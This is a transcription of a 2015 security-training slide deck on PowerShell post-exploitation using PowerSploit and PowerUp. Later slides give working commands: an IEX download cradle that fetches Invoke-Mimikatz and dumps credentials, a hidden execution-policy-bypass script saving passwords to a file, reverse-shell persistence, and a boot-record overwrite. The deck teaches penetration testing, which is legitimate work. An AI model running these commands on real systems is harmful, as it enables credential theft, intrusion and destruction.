POST-EXPLOITATION WITH WINDOWS POWERSHELL

Transcription

1 POST-EXPLOITATION WITH WINDOWS POWERSHELL Jerold Hoong, OSCP Associate, Singapore 27 th May 2015 ASPAC Hacknet Conference and Security Training

2 Agenda No. CHAPTER 1 PowerShell Exploitation Frameworks 3 Overview on PowerSploit and Veil-PowerTools s PowerUp Module 4 Installing PowerSploit / PowerUp 5 Network of Demo Scenario 6 Demo 7 Next Steps? 8 Questions and Answers ~EOF~ 1

3 What is this presentation about? This presentation will showcase the use of PowerShell scripting exploitation frameworks coupled with various penetration testing tools and AV evasion techniques for post-exploitation on compromised hosts. Mimikatz Click to edit Master title style 2

4 PowerShell 101 What is PowerShell? Similar to Unix s Bash Shell, aka Bash for Windows Task-based command-line shell and scripting language Installed by default on Windows Server 2008, 2012, 7, 8 and 10 Used by system administrators to automate tasks and configure windows servers Why use PowerShell as an attacker? Provides access to almost everything on a Window s platform Supported on Windows XP Easy to learn and powerful Has the ability to execute scripts in memory (AV evasion) Has a powerful scripting environment bundled together (PowerShell ISE) 3

5 Exploitation Frameworks PowerSploit Collection of Microsoft PowerShell modules and scripts that can be used to aid penetration testers during all phases of an assessment. Available in Kali Linux by default at /usr/share/powersploit (git clone to get the bleeding edge ). Written by Matt Graeber. Veil-PowerTools Collection of PowerShell modules and scripts with a focus on offensive operations. Consists of PewPewPew, PowerBreach, PowerPick, PowerUp and PowerView components. The PowerUp component will be shown in the demo later. Written Nishang Framework and collection of scripts and payloads which enables usage of PowerShell for offensive security and post exploitation. Written by Nikhil Mittal. 4

6 Overview of PowerSploit Categories of PowerShell Scripts in PowerSploit Code Execution (DLL and Shellcode Injection) Script Modification (Script encryption, encoding and compression utility) Persistence (Backdoor) Antivirus Bypass Exfiltration Mayhem Recon Code Execution Invoke-Shellcode The Invoke-Shellcode function available from the Invoke-Shellcode.ps1 script allows injection of shellcode into the process ID of your choice or into PowerShell locally. This functionality will be demonstrated in the demo scenario later. 5

7 Overview of Veil-PowerTools s PowerUp PowerUp! PowerUp was created to allow a clean way to audit client systems for common Windows privilege escalation vectors. It utilizes various service abuse checks,.dll hijacking opportunities, registry checks, and more to enumerate common ways that you might be able to elevate on a target system. Module Functions Service Enumeration Service Abuse DLL Hijacking Registry Checks Misc. Checks More on this in the demo later. 6

8 Installing PowerSploit / PowerUp It is simple: git clone: git clone: Alternatively, you can download the zip archive directly from GitHub. 7

9 Importing Modules and Scripts There are 2 ways to import modules and scripts: 1. Normal way, requires module/script to be on the host locally. Import-Module <Module/Script> OR 2. Quick way, module/script can be at a remote location and imported into PowerShell s memory context using the IEX download cradle: IEX (New-Object Net.Webclient).DownloadString( ) 8

10 Importing Modules and Scripts Using the IEX cradle to download and load a script straight from GitHub 9

11 Network of Demo Scenario Simplified Demo Scenario VICTIM WINDOWS PC Network: /24 ATTACKER KALI LINUX

12 Techniques Covered in the Demo Pre- Exploitation Reconnaissance Conducting discovery scans with ARP and port scanner tools Post-Exploitation with Limited Access User Account Identifying current available privileges Checking running services for misconfigurations Obtaining a stealthy meterpreter shell Using ring0 kernel exploits for privilege escalation Post-Exploitation with Full Administrator Account Dumping account credentials with the mimikatz tool Enabling RDP remotely to gain interactive access Running exfiltration tools like keyloggers 11

13 Demo 12

14 Demo srvcheck3.exe Sample Output 13

15 Next Steps? Now that we have full administrator access, what else could PowerSploit do? You can experiment with the different modules, such as: Persistence.ps1 Allows you to have persistent access to the compromised host, such as automatically running a reverse tcp shell connection back to your attacking Kali Host every time a victim user logs in successfully. 14

16 Next Steps? Invoke-Mimikatz.ps1 Dump Windows credentials using Mimikatz, which we already did with the msfconsole. Example: powershell IEX (New-Object Net.Webclient).DownloadString (" Invoke-Mimikatz.ps1"); Invoke-Mimikatz -DumpCreds 15

17 Next Steps? Example: OFF PowerShell.exe -windowstyle hidden -NoProfile -Command "& {Start-Process PowerShell.exe -ArgumentList '-windowstyle hidden -NoProfile -ExecutionPolicy Bypass -File ""%~dpn0.ps1""' -Verb RunAs} -passwd.ps1 $ScriptPath = Split-Path -parent $MyInvocation.MyCommand.Definition IEX (New-Object Net.Webclient).DownloadString(" owersploit/master/exfiltration/invoke-mimikatz.ps1") Invoke-Mimikatz -DumpCreds > $scriptpath/pass.txt 16

18 Next Steps? Invoke-Portscan.ps1 (Alternative if no Nmap is installed on compromised host) Conduct further recon on compromised host s network. Example: Invoke-Portscan -Hosts /24 -T 4 -TopPorts 25 -oa localnet 17

19 Next Steps? Mayhem Module: Set-MasterBootRecord -BootMessage ~Quick Demo~ 18

20 Questions? 19

21 Sources and References No URL Framework/PowerTools/master/PowerUp/README.md 20

22 ~EOF~ 21

23 Thank you Presentation by Jerold Hoong

24 2015 KPMG LLP, a UK limited liability partnership, is a subsidiary of KPMG Europe LLP and a member firm of the KPMG network of independent member firms affiliated with KPMG International Cooperative, a Swiss entity. All rights reserved. The KPMG name, logo and cutting through complexity are registered trademarks or trademarks of KPMG International Cooperative (KPMG International).